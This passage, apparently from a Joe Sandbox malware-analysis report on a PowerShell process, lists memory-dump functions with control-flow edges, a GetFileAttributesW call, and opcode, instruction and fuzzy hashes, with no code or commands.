        control_flow_graph 182 fa9fc0-faa012 186 faa01a-faa045 GetFileAttributesW 182->186 187 faa014-faa017 182->187 188 faa04e-faa06b 186->188 189 faa047-faa04d 186->189 187->186 189->188
        APIs
        • GetFileAttributesW.KERNELBASE(00000000), ref: 00FAA038
        Memory Dump Source
        • Source File: 00000012.00000002.799132663.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_fa0000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: d9ca26b34e92b8a498b03b6cc3ed4be061a4aac2d0eb56d7c863e12e73543082
        • Instruction ID: 928a340fe5c60070230ddccbca6fb4d4b6e025982df1191aa4b456e7b43c7a96
        • Opcode Fuzzy Hash: d9ca26b34e92b8a498b03b6cc3ed4be061a4aac2d0eb56d7c863e12e73543082
        • Instruction Fuzzy Hash: 5E1133B1D006199BCB14CF9AD844B9EFBB4FF49324F15811AD819B7700C774AA05CFA1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00FA58F4 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 192 fa58f4-faa012 196 faa01a-faa045 GetFileAttributesW 192->196 197 faa014-faa017 192->197 198 faa04e-faa06b 196->198 199 faa047-faa04d 196->199 197->196 199->198
        APIs
        • GetFileAttributesW.KERNELBASE(00000000), ref: 00FAA038
        Memory Dump Source
        • Source File: 00000012.00000002.799132663.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_fa0000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: ece46354509f4c123f49a47105e4c93632ac0fa9b0f8873572aeec9916d5b074
        • Instruction ID: d74c65b504a904798a79d41978670d42c236fd80a6d1bafe71ea01449334db04
        • Opcode Fuzzy Hash: ece46354509f4c123f49a47105e4c93632ac0fa9b0f8873572aeec9916d5b074
        • Instruction Fuzzy Hash: 47211EB1D046199BCB10CFAAD844B9EFBB4FB49324F05812AE819A7640C774A904CFA1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00DBD01D Relevance: .0, Instructions: 45COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000012.00000002.798138532.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_dbd000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 114164c1f85d352e34ed4fa993dd5bc0b1060b36968502020243a1bd68c4cc66
        • Instruction ID: 8b0dcdc93cc5d308494de553be1e0063dd1db74b44132e42ecc0b3b49c1025f6
        • Opcode Fuzzy Hash: 114164c1f85d352e34ed4fa993dd5bc0b1060b36968502020243a1bd68c4cc66
        • Instruction Fuzzy Hash: 5B01F270408340EAE7209E21CCC4BA7FB99EF41768F1C801AED8A5B286D3799C05CAB1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00DBD005 Relevance: .0, Instructions: 45COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000012.00000002.798138532.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_dbd000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c5da180751e8670896215e30e8cb3e8c934fd9ae932613c8057ba02378535253
        • Instruction ID: 0947d2e0daa135c6ee141f8546373c6f67be5d2f41ac7514a90c9e52cd2c1216
        • Opcode Fuzzy Hash: c5da180751e8670896215e30e8cb3e8c934fd9ae932613c8057ba02378535253
        • Instruction Fuzzy Hash: 7701406140E3C09ED7128B258C94B52BFB4DF53224F1D81DBD9859F197D2695C48CB72
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 00FAB478 Relevance: 1.3, Instructions: 1346COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000012.00000002.799132663.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_fa0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5d41b78e2c20600b598b98d4925b98676f23024296f14d738984b8b37930d1d5
        • Instruction ID: f872caaef8f152849abf594d884320df2c6f0082bf86c70105e4649b3e20ed6f
        • Opcode Fuzzy Hash: 5d41b78e2c20600b598b98d4925b98676f23024296f14d738984b8b37930d1d5
        • Instruction Fuzzy Hash: 63A2B030B042189BDF28EB75CC61BAE35A7EBC4744F24806D960A9B394DF795DC18BE1
        Uniqueness

        Uniqueness Score: -1.00%